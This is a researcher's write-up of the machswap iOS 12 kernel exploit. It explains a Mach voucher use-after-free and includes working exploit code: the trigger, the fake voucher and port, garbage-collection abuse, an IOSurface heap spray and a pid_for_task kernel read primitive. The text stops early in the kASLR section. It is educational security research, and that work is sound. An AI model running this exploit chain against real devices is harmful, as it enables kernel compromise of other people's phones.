Back at the end of January I demo’d an early iOS 12 prototype jailbreak, which included a homebrewed kernel exploit, root FS remount, and nonce setter. I achieved this in a little under two days with help from my good friends @S1guza, @littlelailo, and @stek29, making it one of the first iOS 12 prototype jailbreaks, before any public kernel exploits were released (subtle flex). About a month later I tidied up the source code and released the initial non-SMAP exploit under the name machswap (I later released an SMAP-compatible version, machswap2, which can also be found on my GitHub). I wanted to create a writeup detailing the bug and how the exploit works, in order to inspire and help others who are interested in iOS security research.

Looking at a modern iOS exploit

On the 23rd of January 2019, security researcher @S0rryMybad released a proof of concept exploit for a kernel bug affecting iOS 12.1.2 and below. A little over five and a half hours later he followed it up with a Chinese blog post describing the bug and possible exploitation techniques, and later an English version.

The bug is a use-after-free vulnerability which can be triggered from a sandboxed process on iOS, such as an app. It stems from a reference counting issue caused by a poorly implemented function within the kernel.

Before explaining the details of the bug, it’s important to understand a little about MIG, and the Mach subsystem in XNU (XNU is the kernel used on iOS, macOS, etc, devices).

0x01 Mach, MIG, and UAFs

Mach is an IPC or “Inter-Process Communication” layer, which allows processes on a system to talk to one another. This includes the kernel, as well as other system services and daemons which are responsible for handling specific tasks (for example, the userland daemon bluetoothd implements a Mach server, which can be accessed to set up and manage bluetooth connections). It’s a postbox-like system which involves sending letters (Mach messages) between postboxes (Mach ports). Different postboxes (Mach ports) have different “rights”, for example you may only be able to send mail from some postboxes (a send right) whilst only being able to receive mail in others (a receive right). All postboxes have a specific address, in XNU this is known as a “handle”.
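
To make the postbox analogy concrete, here’s a tiny standalone sketch (unrelated to the exploit itself) which allocates a port, then sends and receives a trivial message on it:

#include <mach/mach.h>
#include <stdio.h>

int main(void)
{
    mach_port_t port = MACH_PORT_NULL;

    /* allocate a new "postbox": a port with a receive right in our IPC space */
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);

    /* give ourselves a send right on it too, so we can post mail to it */
    mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);

    /* send a trivial, header-only message to the port */
    mach_msg_header_t msg = {
        .msgh_bits        = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0),
        .msgh_size        = sizeof(msg),
        .msgh_remote_port = port,
        .msgh_local_port  = MACH_PORT_NULL,
        .msgh_id          = 0x1234,
    };
    mach_msg(&msg, MACH_SEND_MSG, sizeof(msg), 0, MACH_PORT_NULL,
             MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    /* receive it back on the same port */
    struct {
        mach_msg_header_t  head;
        mach_msg_trailer_t trailer;
    } rcv = {0};
    mach_msg(&rcv.head, MACH_RCV_MSG, 0, sizeof(rcv), port,
             MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    printf("received message with id 0x%x\n", rcv.head.msgh_id);
    return 0;
}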

While it can be done, writing raw Mach code is a very tedious and time consuming process, and it’s easy to make mistakes which can potentially cause issues or create vulnerabilities within Mach server processes.

Therefore, Apple created a tool called MIG (“Mach Interface Generator”). It allows far quicker development of Mach interfaces, and is used all over iOS to design and handle Mach communication between both services and the kernel. When using MIG to generate Mach code, you can write definitions for functions you want to be able to access over the Mach API. “jailbreakd”, used in the Meridian and Electra jailbreaks, is one such example of a Mach server using MIG-generated code, and you can see the template used to generate the “jbd_call” function which jailbreakd implements here:

// mig -sheader jailbreak_daemonServer.h -header jailbreak_daemonUser.h mig.defs

subsystem jailbreak_daemon 500;
userprefix jbd_;
serverprefix jbd_;

WaitTime 2500;

#include <mach/std_types.defs>
#include <mach/mach_types.defs>

routine call(server_port : mach_port_t;
             in command  : uint8_t;
             in pid      : uint32_t);

This will expose a “jbd_call” function implemented within jailbreakd, which can then be accessed by any clients that wish to communicate with it. Here, three arguments are provided to the server: the Mach port of the request, a byte which represents the command, and an unsigned 32-bit integer which represents the PID (Process ID) of the target process for jailbreakd to operate on.
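
As a rough illustration of the client side (not taken from the jailbreak sources), the generated user stub would have a prototype along the lines of jbd_call(server_port, command, pid), and a client would look up the service port and call it; the bootstrap service name below is a placeholder:

#include <mach/mach.h>
#include <servers/bootstrap.h>

/* prototype of the MIG-generated client stub (userprefix jbd_) */
kern_return_t jbd_call(mach_port_t server_port, uint8_t command, uint32_t pid);

kern_return_t ask_jailbreakd(uint8_t command, uint32_t pid)
{
    mach_port_t jbd_port = MACH_PORT_NULL;

    /* "com.example.jailbreakd" is a placeholder service name */
    kern_return_t kr = bootstrap_look_up(bootstrap_port, "com.example.jailbreakd", &jbd_port);
    if (kr != KERN_SUCCESS)
        return kr;

    /* the generated stub packs the arguments into a Mach message,
       sends it to jbd_port, and handles the reply for us */
    return jbd_call(jbd_port, command, pid);
}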

MIG simply allows you to define this function, and will handle all of the raw Mach heavy lifting. This includes managing messages, reply ports, timeouts, and the lifetime or refcounts (reference counts) of objects. A “refcount” is simply a counter of how many places the object is being accessed or used from. Once an object reaches a reference count of zero, the object can be released, as there is no longer any code on the system using the object.

But is this always the case? A bug which allows an attacker to decrement the reference count more than intended often means the object can be released while it’s still being used by other code, leading to a use-after-free (UAF) condition. This is often referred to as “dropping a ref”. “Releasing” in this case means the memory which the object is held in is handed back to the allocator (a mechanism which manages memory allocations; in userland this is “malloc”, in the kernel this is often “kalloc”). This is also known as “freeing” the memory (hence the term use-after-free), and means the memory can then be re-allocated and used by other code for other purposes. However, if a piece of memory used by function “A” is released and then re-used by function “B”, this has the potential to interfere with the workings of function “A”.

It’s important to note that the object or memory allocation which has been UAF’d doesn’t have to be continuously used by a single function; the important thing is that the code using the released object still views it as “valid” and thinks it has exclusive use of it, even though, as far as the allocator is concerned, that memory has been released and may have been handed out elsewhere.
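
To make that concrete, here is a contrived userland sketch (not kernel code) of how one refcount drop too many becomes a use-after-free:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    int  refs;
    char data[32];
} object_t;

object_t *object_create(void)
{
    object_t *o = calloc(1, sizeof(object_t));
    o->refs = 1;                    /* one reference, held by the creator */
    return o;
}

void object_retain(object_t *o)
{
    o->refs++;
}

void object_release(object_t *o)
{
    if (--o->refs == 0)
        free(o);                    /* memory handed back to the allocator */
}

int main(void)
{
    object_t *o = object_create();  /* refs = 1 */
    object_retain(o);               /* refs = 2: some other code uses it too */

    object_release(o);              /* intended drop:    refs = 1 */
    object_release(o);              /* buggy extra drop: refs = 0, object freed */

    /* we still hold a pointer and believe it's valid: a use-after-free.
       the allocator is free to hand this memory to anyone else. */
    strcpy(o->data, "AAAA");        /* undefined behaviour */
    printf("%s\n", o->data);
    return 0;
}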

From a more abstract standpoint, many bugs are based on the idea of mismatching states between two or more pieces of code or mechanisms. For example, with an integer overflow, you might want to mismatch the actual size of an allocation with how large the code thinks the allocation is. If you consider the kernel as an incredibly large state machine, we’re effectively placing it into an unintended state where some code is using an allocation of memory whilst some other code (the allocator) is allowing that same memory to be re-used by other attacker-influenced code. It’s like walking up to a parking meter and pressing ↑↑↓↓←→←→BA in order to put the machine in a weird state and get a free parking ticket.

0x02 The Vuln

This leads us on to the vulnerability used in this kernel exploit. Let’s take a look at the following function:

kern_return_t
task_swap_mach_voucher(
	task_t			task,
	ipc_voucher_t		new_voucher,
	ipc_voucher_t		*in_out_old_voucher)
{
	if (TASK_NULL == task)
		return KERN_INVALID_TASK;

	*in_out_old_voucher = new_voucher;
	return KERN_SUCCESS;
}

Looks fairly simple, right? It simply swaps a voucher in a pointer with a new voucher. This function can be accessed from userland (ie. an iOS app) via the Mach API, and the call between kernel and userland is handled by MIG. However, let’s take a look at that MIG code:

        task = convert_port_to_task(In0P->Head.msgh_request_port);

        /* increments by one */
        new_voucher = convert_port_to_voucher(In0P->new_voucher.name);

        /* increments by one */
        old_voucher = convert_port_to_voucher(In0P->old_voucher.name);

        RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);
        ipc_voucher_release(new_voucher); /* decrements by one */
        task_deallocate(task);
        if (RetCode != KERN_SUCCESS) {
                MIG_RETURN_ERROR(OutP, RetCode);
        }
        if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
                ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);

        if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
                ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);
                
        /* decrements by one */
        OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);

To generate this code, you can download the corresponding .defs file for the function from the XNU sources, and run the command mig -DKERNEL -DKERNEL_SERVER mig.defs

At first glance, this code looks fine. Each voucher object has its refcount incremented by one, and then decremented by one. However, because the MIG code has no understanding of what the kernel code (task_swap_mach_voucher) itself is doing, and vice-versa, an issue arises. After task_swap_mach_voucher is called, old_voucher and new_voucher will be equal (remember, task_swap_mach_voucher assigns new_voucher into old_voucher). Therefore, the refcount on new_voucher will be incremented once, and then decremented twice: once by ipc_voucher_release, and once by convert_voucher_to_port (again, old_voucher is now equal to new_voucher). The refcount on the original old_voucher, meanwhile, is never decremented at all. This leads us to the following proof of concept (PoC):

        mach_voucher_attr_recipe_data_t atm_data = 
        {
                .key = MACH_VOUCHER_ATTR_KEY_ATM,
                .command = 510
        };

        mach_port_t p1;
        ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);

        mach_port_t p2;
        ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p2);

        mach_port_t p3;
        ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p3);

        /* 
                We assign p1 (our target voucher) onto our thread so it can be retrieved 
                again later via thread_get_mach_voucher.
                This will increment a ref on the voucher -- the current refcount is 2 
        */
        ret = thread_set_mach_voucher(mach_thread_self(), p1);

        ret = task_swap_mach_voucher(mach_task_self(), p1, &p2); // Trigger the bug once, this drops a ref from 2 to 1 

        ret = task_swap_mach_voucher(mach_task_self(), p1, &p3); // Second trigger, this frees the voucher (refcnt=0)

        /* Ask for a handle on the dangling voucher, 9 times out of 10 this will cause a panic due to the bad refcnt etc */ 
        mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
        ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);

Here we trigger the bug twice via the task_swap_mach_voucher call to drop two refs on the target voucher. This then leaves us with a pointer on our thread to a free’d voucher in kernel memory.

0x03 Beginning our Exploitation

Once the voucher has been free’d, we can replace it with attacker-controlled data via a technique called “heap spraying”. The idea is to fill or “spray” the kernel heap (an area of memory in which allocations managed by the allocator are created and destroyed) so that our own data overwrites the now-free’d voucher. If this is done successfully, the voucher pointer on our thread will point to our arbitrary voucher struct, and we can use the thread_get_mach_voucher function to get a userland handle on that voucher, which can then be passed to Mach APIs to gain new attack primitives.

The ipc_voucher struct is defined as follows:

struct ipc_voucher {
	iv_index_t		iv_hash;	/* checksum hash */
	iv_index_t		iv_sum;		/* checksum of values */
	os_refcnt_t		iv_refs;	/* reference count */
	iv_index_t		iv_table_size;	/* size of the voucher table */
	iv_index_t		iv_inline_table[IV_ENTRIES_INLINE];
	iv_entry_t		iv_table;	/* table of voucher attr entries */
	ipc_port_t		iv_port;	/* port representing the voucher */
	queue_chain_t		iv_hash_link;	/* link on hash chain */
};

We can see the iv_refs field, which contains the reference count that we dropped, and, importantly, a pointer to an ipc_port_t in iv_port. The ipc_port_t struct is the kernel representation of a generic Mach port. In this case, the ipc_voucher holds an ipc_port_t pointer as a field whilst implementing some of its own attributes (for example, iv_table and iv_inline_table).

One important thing to note about the voucher port is that it doesn’t have a receive right. In Mach, ports can have send and receive rights. If the port has a send right you can send messages on that port, and if the port has a receive right you can receive messages on that port. Since we have no receive right here, this means the exploit strays slightly from the de-facto exploitation (ie. v0rtex). However, the same results can still be achieved by using slightly different primitives – this will come into play later.

When we perform our heap spray we want to spray these ipc_voucher structs onto the kernel heap and replace the free’d voucher struct with an arbitrary one. The main goal is to gain control of the iv_port field, and point that into an attacker controlled ipc_port. This is the basis of how many Mach API-based exploitation techniques work: get a userland handle onto an attacker-controlled ipc_port which is “theoretically” owned and managed by the kernel.

This is where the “non-SMAP” element of this exploit comes into play. On SMAP devices (A10 and newer), the kernel is unable to directly access memory in userland. SMAP (Supervisor Mode Access Prevention) is implemented to stop attackers from backing kernel objects with userland allocations, which could otherwise be modified directly from userland without any special tricks. However, on non-SMAP devices (<=A9), we are still able to abuse this technique when performing exploitation (SMAP has to be implemented in hardware, and therefore can’t be backported to older devices via firmware updates).

In this case, we can spray an ipc_voucher struct, where the iv_port field contains a pointer to an ipc_port allocated in userland. This means the kernel will use our ipc_port as if it had been created and allocated in kernelspace, when in fact it has been allocated in userland and can be manipulated and updated by us directly. Here is the code in the exploit which sets up this voucher:

    kport_t *fakeport = malloc(0x4000);
    mlock((void *)fakeport, 0x4000);
    bzero((void *)fakeport, 0x4000);
    
    fakeport->ip_bits = IO_BITS_ACTIVE | IKOT_TASK;
    fakeport->ip_references = 100;
    fakeport->ip_lock.type = 0x11;
    fakeport->ip_messages.port.receiver_name = 1;
    fakeport->ip_messages.port.msgcount = 0;
    fakeport->ip_messages.port.qlimit = MACH_PORT_QLIMIT_LARGE;
    fakeport->ip_messages.port.waitq.flags = mach_port_waitq_flags();
    fakeport->ip_srights = 99;
     
    LOG("fakeport: 0x%llx", (uint64_t)fakeport);

    /* the fake voucher to be sprayed */
    fake_ipc_voucher_t fake_voucher = (fake_ipc_voucher_t)
    {
        .iv_hash = 0x11111111,
        .iv_sum = 0x22222222,
        .iv_refs = 100,
        .iv_port = (uint64_t)fakeport
    };

You can see we create a fake ipc_voucher which contains 100 refs (this is so the object will never prematurely be destroyed), and the iv_port field contains a pointer directly to our userland fakeport object.

Now we need to spray this object into kernel memory. However; there is a slight problem, and that is related to the “kalloc” allocator and “kalloc zones”.

0x04 Borachio and the Climate Control Team (Abusing GC)

Kalloc, the XNU allocator used to allocate the ipc_voucher struct which we have UAF’d, uses a series of “zones” into which objects are allocated. These are sections of heap memory which only contain objects of a specific size or type. For example, the kalloc.32 zone contains objects which are <=32 bytes in size (but >16 bytes, as kalloc.16 is the next smallest zone). You can take a look at some of these zones by using the “zprint” command on an OSX or iOS system:

$ sudo zprint | awk 'NR<=3 || /kalloc|ipc.ports/'
                             elem         cur         max        cur         max         cur  alloc  alloc    
zone name                   size        size        size      #elts       #elts       inuse   size  count    
-------------------------------------------------------------------------------------------------------------
kalloc.16                     16      12592K      13301K     805888      851264      802478     4K    256   C
kalloc.32                     32       3652K       3941K     116864      126113      113244     4K    128   C
kalloc.48                     48       5952K       8867K     126976      189169      121315     4K     85   C
kalloc.64                     64       9212K      13301K     147392      212816      145701     4K     64   C
kalloc.80                     80       2988K       3941K      38246       50445       37847     4K     51   C
kalloc.96                     96       1496K       1556K      15957       16607       15011     8K     85   C
kalloc.128                   128       5400K       5911K      43200       47292       41427     4K     32   C
kalloc.160                   160       1432K       1556K       9164        9964        7958     8K     51   C
kalloc.192                   192        876K       1037K       4672        5535        4520    12K     64   C
kalloc.224                   224       9488K      10509K      43373       48043       36239    16K     73   C
kalloc.256                   256       2912K       3941K      11648       15764       10799     4K     16   C
kalloc.288                   288       3260K       3892K      11591       13839       10416    20K     71   C
kalloc.368                   368       3488K       4151K       9705       11553        8810    32K     89   C
kalloc.400                   400       2640K       3892K       6758        9964        5665    20K     51   C
kalloc.512                   512       3636K       3941K       7272        7882        6848     4K      8   C
kalloc.576                   576        212K        345K        376         615         290     4K      7   C
kalloc.768                   768       2676K       3503K       3568        4670        3009    12K     16   C
kalloc.1024                 1024       3716K       5911K       3716        5911        3503     4K      4   C
kalloc.1152                 1152        320K        461K        284         410         200     8K      7   C
kalloc.1280                 1280       1040K       1153K        832         922         723    20K     16   C
kalloc.1664                 1664        700K        717K        430         441         399    28K     17   C
kalloc.2048                 2048        932K       1167K        466         583         456     4K      2   C
kalloc.4096                 4096       4816K      13301K       1204        3325        1140     4K      1   C
kalloc.6144                 6144      16704K      26602K       2784        4433        2628    12K      2   C
kalloc.8192                 8192       1536K       5254K        192         656         187     8K      1   C
ipc.ports                    168       5580K      18660K      34011      113737       33156    12K     73   C

The appended awk command will print the first 3 lines of the zprint output (the table header), as well as any lines which contain ‘kalloc’ or ‘ipc.ports’.

Note: the output will vary slightly between an iOS and OSX system. For example, there are some differences in the kalloc zones. This output was dumped from an OSX system.
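
As a rough illustration of the size-to-zone relationship (this is not the kernel’s actual lookup code; the zone sizes are simply copied from the output above and vary between kernel versions):

#include <stdio.h>
#include <stddef.h>

/* zone sizes taken from the zprint output above; real kernels differ per version */
static const size_t kalloc_zone_sizes[] = {
    16, 32, 48, 64, 80, 96, 128, 160, 192, 224, 256, 288, 368, 400,
    512, 576, 768, 1024, 1152, 1280, 1664, 2048, 4096, 6144, 8192
};

/* return the smallest zone that fits a request of `size` bytes,
   or 0 if it falls outside the zones listed here */
static size_t kalloc_zone_for_size(size_t size)
{
    for (size_t i = 0; i < sizeof(kalloc_zone_sizes) / sizeof(kalloc_zone_sizes[0]); i++)
    {
        if (size <= kalloc_zone_sizes[i])
            return kalloc_zone_sizes[i];
    }
    return 0;
}

int main(void)
{
    printf("a 30-byte allocation lands in kalloc.%zu\n", kalloc_zone_for_size(30));    /* kalloc.32   */
    printf("a 900-byte allocation lands in kalloc.%zu\n", kalloc_zone_for_size(900));  /* kalloc.1024 */
    return 0;
}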

In this zprint output we can see all of the kalloc zones, as well as a special zone called ‘ipc.ports’. This is the zone into which ipc ports are allocated – including our ipc_voucher. There are no primitives which allow spraying arbitrary data into the ipc.ports zone, so in order to spray the page containing our free’d voucher we first need to release that page from the ipc.ports zone back to the allocator, and then have it re-allocated into a kalloc zone (which can be sprayed into). This can be done via the GC (Garbage Collection) mechanism. Triggering GC will release any unused pages back to the allocator.

On iOS 10 and older, this mechanism could be triggered directly via a Mach call to the kernel. However, in iOS 11 this functionality was removed, so attackers must now trigger it indirectly; several techniques exist for doing so. In Siguza’s v0rtex writeup, he described one such method:

[…] you should still be able to trigger a garbage collection by iterating over all zones, allocating and subsequently freeing something like 100MB in each, and measuring how long it takes to do so - garbage collection should be a significant spike

Hence the following function. Here we allocate a message body which will be sent into the kalloc.16384 zone, and send it (via the send_kalloc_message function) up to 256 times, recording how long each send takes. If a single send takes longer than 1,000,000 nanoseconds (1 millisecond), we can assume GC has been triggered.

void trigger_gc_please()
{   
    [...]

    uint32_t body_size = message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
    uint8_t *body = malloc(body_size);
    memset(body, 0x41, body_size);
    
    for (int i = 0; i < gc_ports_cnt; i++)
    {
        uint64_t t0, t1;

        t0 = mach_absolute_time();
        gc_ports[i] = send_kalloc_message(body, body_size);
        t1 = mach_absolute_time();

        if (t1 - t0 > 1000000)
        {
            LOG("got gc at %d -- breaking", i);
            gc_ports_max = i;
            break;
        }
    }

    [...]

    sched_yield();
    sleep(1);
}

Whilst machswap is a particularly fast exploit, this is its slowest part – and a critical one. If triggering GC fails, the page will not be released, our heap spray will fail, and with it the entire exploit. Since GC works asynchronously (at the same time as other code), we need to wait some time to ensure it has completed, hence the sched_yield and sleep calls in the epilogue of this function.

An important factor of GC that must be taken into consideration is that all objects on a given page must be released before the page itself can be released. This means there cannot be a single allocation existing on the same page as our target UAF voucher. To combat this, 0x2000 ports are allocated before our target “p1”, and a further 0x1000 after. See the following code:

    /* allocate 0x2000 vouchers to alloc some new fresh pages */
    for (int i = 0; i < 0x2000; i++)
    {
        ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &before[i]);
    }
    
    /* alloc our target uaf voucher */
    mach_port_t p1;
    ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);
    
    /* allocate 0x1000 more vouchers */
    for (int i = 0; i < 0x1000; i++)
    {
        ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &after[i]);
    }

    /*
        theoretically, we should now have 3 blocks of memory (roughly) as so:
        |--------------------|-------------|------------------|
        |     ipc ports      | target port |  more ipc ports  |
        |--------------------|-------------|------------------| 
                             ^             ^
                              page with only our controlled ports
        hopefully our target port is now allocated on a page which contains only our 
        controlled ports. this means when we release all of our ports *all* allocations
        on the given page will be released, and when we trigger GC the page will be released
        back from the ipc_ports zone to be re-used by kalloc 
        this allows us to spray our fake vouchers via IOSurface in other kalloc zones 
        (ie. kalloc.1024), and the dangling pointer of the voucher will then overlap with one
        of our allocations
    */

After triggering the UAF bug and releasing the target port, we can then release all of our controlled ports and then continue in attempting to trigger GC.

0x05 A Heap Spray for your Sprog

Assuming all has gone to plan, by this point GC will have been triggered, and our page released back to the allocation pool. We can then continue with our heap spray in order to send our fake voucher into the kernel and replace the free’d voucher. For this we can make use of an IOKit UserClient implemented in the “IOSurface” kext (kernel extension). IOKit is a kernel interface for handling drivers and extensions, and a user client is an object which allows a user to issue commands to a kernel extension. IOSurface is a kext designed for handling and performing calculations on graphical buffers, however it also provides a great heap spraying primitive for us, for two reasons. Firstly, IOSurface (specifically the “set value” method) allows us to provide an encoded plist (property list) containing objects such as arrays (OSArray), dictionaries (OSDictionary), strings (OSString), etc. Within these objects we can place completely arbitrary data (including nested types, ie. a dictionary inside of an array). Secondly, the IOSurface userclient is accessible from the app sandbox, as there are no entitlement or permission checks, nor any blocks from the sandbox.

To spray our data, we set up a single Surface, and then use an array containing a single dictionary, where each entry contains one of the OSStrings we want to spray. An OSString can be any size, however we want to fill entire pages of memory with our data. On 4K devices the pagesize is 0x1000 (4,096) bytes, and on 16K devices it is 0x4000 (16,384). Due to the “string” part of OSString, our data must be terminated with a NULL byte, so we need to account for this in our size calculations. The code shown after the following snippet builds the data which will be set onto the surface (and hence sprayed into kernel memory), with the bcopy loop then filling each of our OSStrings with copies of our fake ipc_voucher.
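
Note that the spray code assumes we already have an open handle on the IOSurfaceRootUserClient (the client variable) and a surface created on it (giving us surface->id); the surface creation goes through another IOSurface external method which isn’t shown here. Opening the userclient itself looks roughly like this sketch (userclient type 0 is what’s commonly used for IOSurfaceRootUserClient; error handling trimmed):

#include <IOKit/IOKitLib.h>

/* open a handle on the IOSurfaceRootUserClient */
io_connect_t open_iosurface_client(void)
{
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                       IOServiceMatching("IOSurfaceRoot"));
    io_connect_t client = IO_OBJECT_NULL;

    if (service != IO_OBJECT_NULL)
    {
        /* type 0 selects the IOSurfaceRootUserClient */
        IOServiceOpen(service, mach_task_self(), 0, &client);
        IOObjectRelease(service);
    }

    return client;
}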

#define FILL_MEMSIZE 0x4000000
    int spray_qty = FILL_MEMSIZE / pagesize; // # of pages to spray
    
    int spray_size = (5 * sizeof(uint32_t)) + (spray_qty * ((4 * sizeof(uint32_t)) + pagesize));
    uint32_t *spray_data = malloc(spray_size); // header + (spray_qty * (item_header + pgsize))
    bzero((void *)spray_data, spray_size);
    
    uint32_t *spray_cur = spray_data;
    
   /*
        +-> Surface
          +-> Array
            +-> Dictionary
              +-> OSString 
              +-> OSString
              +-> OSString 
                etc (spray_qty times)...
   */

    *(spray_cur++) = surface->id;
    *(spray_cur++) = 0x0;
    *(spray_cur++) = kOSSerializeMagic;
    *(spray_cur++) = kOSSerializeEndCollection | kOSSerializeArray | 1;
    *(spray_cur++) = kOSSerializeEndCollection | kOSSerializeDictionary | spray_qty;
    for (int i = 0; i < spray_qty; i++)
    {
        *(spray_cur++) = kOSSerializeSymbol | 5;
        *(spray_cur++) = transpose(i);
        *(spray_cur++) = 0x0;
        *(spray_cur++) = (i + 1 >= spray_qty ? kOSSerializeEndCollection : 0) | kOSSerializeString | (pagesize - 1);
        
        for (uintptr_t ptr = (uintptr_t)spray_cur, end = ptr + pagesize; 
             ptr + sizeof(fake_ipc_voucher_t) <= end; 
             ptr += sizeof(fake_ipc_voucher_t))
        {
            bcopy((const void *)&fake_voucher, (void *)ptr, sizeof(fake_ipc_voucher_t));
        }
        
        spray_cur += (pagesize / sizeof(uint32_t));
    }

We can then make a call to the userclient to set the provided data onto the Surface:

    uint32_t dummy = 0;
    size = sizeof(dummy);
    ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, spray_data, spray_size, &dummy, &size);
    if(ret != KERN_SUCCESS)
    {
        LOG("setValue(prep): %s", mach_error_string(ret));
        goto out;
    }

If this has worked correctly, our free’d ipc_voucher will now have been replaced with the fake voucher which we copied into kernel memory via our heap spray. This means the voucher pointer stashed on our thread will now point to our fake ipc_voucher, which in turn points to our fake ipc_port, allocated in userland as fakeport. We can now attempt to get a handle onto this voucher/port via the thread_get_mach_voucher call:

    mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
    
    /* fingers crossed we get a userland handle onto our 'fakeport' object */
    ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);

    LOG("port: %x", real_port_to_fake_voucher);
    
    /* things are looking good; should be 100% success rate from here */
    LOG("WE REALLY POSTED UP ON THIS BLOCK");
    
    mach_port_t the_one = real_port_to_fake_voucher;

From here, things are looking good. Assuming our port is in fact valid, we should have a 100% success rate from this point – the dangerous parts are now over.

0x06 Eavesdropping Kernel Memory: Building a Read Primitive

We can now start to build our first read primitive which we can use to read important pointers in the kernel’s memory – these are later used in setting up our fake kernel task struct.

Typically, I would recommend setting up a read primitive via the mach_port_get_attributes Mach call, as demonstrated in the v0rtex exploit, since that call implements proper locking on the port. However, due to the aforementioned lack of a receive right, this is not possible here. Instead, we will use an older but more common technique with regard to Mach-based exploitation: the pid_for_task primitive. The Mach API implements a function called “pid_for_task”, which returns the PID of the process whose task port you provide. Here is the (heavily stripped) kernel code:

pid_for_task(
	struct pid_for_task_args *args)
{
	mach_port_name_t	t = args->t;
	user_addr_t		pid_addr  = args->pid;
        
        [...]

	t1 = port_name_to_task_inspect(t);

        [...]

        p = get_bsdtask_info(t1); /* Get the bsd_info entry from the task */
        if (p) {
                pid  = proc_pid(p); /* Returns p->p_pid */
                err = KERN_SUCCESS; 
        } [...]

	(void) copyout((char *) &pid, pid_addr, sizeof(int));
	return(err);
}

You can see get_bsdtask_info is called on the task port we provide, and then the resulting pid from proc_pid is copied back to userland. The important thing here is that no checks are performed on the validity of the provided task port nor the proc which is returned from get_bsdtask_info (even so, such checks would be futile against this primitive). Let’s look at get_bsdtask_info and proc_pid:

void  *get_bsdtask_info(task_t t)
{
    /* ldr x0, [x0, #0x358]; ret */
    return(t->bsd_info);
}

int
proc_pid(proc_t p)
{
    if (p != NULL)
        /* ldr w0, [x0, #0x60]; ret */
        return (p->p_pid);
    return -1;
}

In essence, via this call, we can retrieve the value of task->bsd_info->p_pid. Since we have control over the task struct (this is a field within our fakeport), we have full control of the address which bsd_info points to. Therefore, by manipulating the bsd_info pointer, we can get a 32-bit read (as p_pid is a 32-bit int, and the value is loaded into the ‘w’ register) of any kernel address we require. If we need to read a 64-bit value, we can use two adjacent 32-bit reads and later combine the values to calculate the original value.

We first allocate a fake task object which resides in the ip_kobject field of our fakeport. We also set the ip_bits field of our fakeport to IO_BITS_ACTIVE | IKOT_TASK – this marks our ipc_port as a port which represents a task, allowing us to use calls such as pid_for_task on it.

    ktask_t *fake_task = (ktask_t *)malloc(0x600); // task is about 0x568 or some shit
    bzero((void *)fake_task, 0x600);
    fake_task->ref_count = 0xff;
    
    uint64_t *read_addr_ptr = (uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_bsd_info);
    
    fakeport->ip_kobject = (uint64_t)fake_task;

read_addr_ptr points to the bsd_info field of our fake task, which we can overwrite with arbitrary kernel addresses. We then implement our 32-bit read primitive like so:

        #define rk32(addr, value)\
        *read_addr_ptr = addr - offsets->struct_offsets.proc_pid;\
        value = 0x0;\
        ret = pid_for_task(the_one, (int *)&value);

Note the addr - offsets->struct_offsets.proc_pid. When the p_pid field is accessed, the kernel adds the offset of p_pid (struct_offsets.proc_pid) to the bsd_info pointer before performing the read. We therefore subtract this value beforehand so that the read lands exactly on the address we want.

As previously noted, we can combine two adjacent 32-bit reads into a full 64-bit read:

        /* read the upper 32 bits, then the lower 32 bits, and OR them together */
        #define rk64(addr, value)\
        rk32(addr + 0x4, read64_tmp);\
        rk32(addr, value);\
        value = value | ((uint64_t)read64_tmp << 32)

We now have a working read primitive based on our fakeport and newly-allocated fake task struct.

0x07 Defeating kASLR

ASLR (Address Space Layout Randomization) is a mitigation used to make exploitation of software harder by shifting all the static data within a program’s address space by a constant but randomized value (hence the “random” element). In the kernel, this is used to shift all of the static regions (__TEXT, __DATA.__const, etc) from a static base value to a higher, random memory location. It’s important to derive this value (known as the kernel “slide”) as it is commonly used by jailbreaks in order to read and write data from static offsets, and call functions in kernel __TEXT.

The first thought that may come to mind when learning about kASLR is simply: “can it be brute forced?” In the typical sense of trying to read from every possible base address until you get valid data, the answer is no. This is due to the fact that the kernel slide can vary by a huge amount, and when attempting to read from every address you would likely hit an unmapped region. If the kernel tries to read from an unmapped region, a fault is triggered, ending in a panic. This would hugely decrease the success rate of the exploit, as you would be relying on a near-perfect guess of where the kernel image is located in memory. Here is the formula used to derive the kernel base address, courtesy of the iPhoneWiki:

        base = 0x01000000 + (slide_byte * 0x00200000)

The slide_byte spans values 0 through 255; however, in the case of 0 a base of 0x21000000 is used, so we can model slide_byte as effectively spanning values 1 through 256. This means the lowest base is 0x01200000, and the highest is 0x21000000. Subtracting these gives 0x1fe00000, which is a whopping 530+ MB of possible locations! Taking this into account, it is clear that brute forcing by simply trying every possible address would more than likely hit unmapped memory.
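
As a quick sanity check of that arithmetic, the following throwaway snippet enumerates the possible bases from the formula above and prints the span they cover:

#include <stdio.h>
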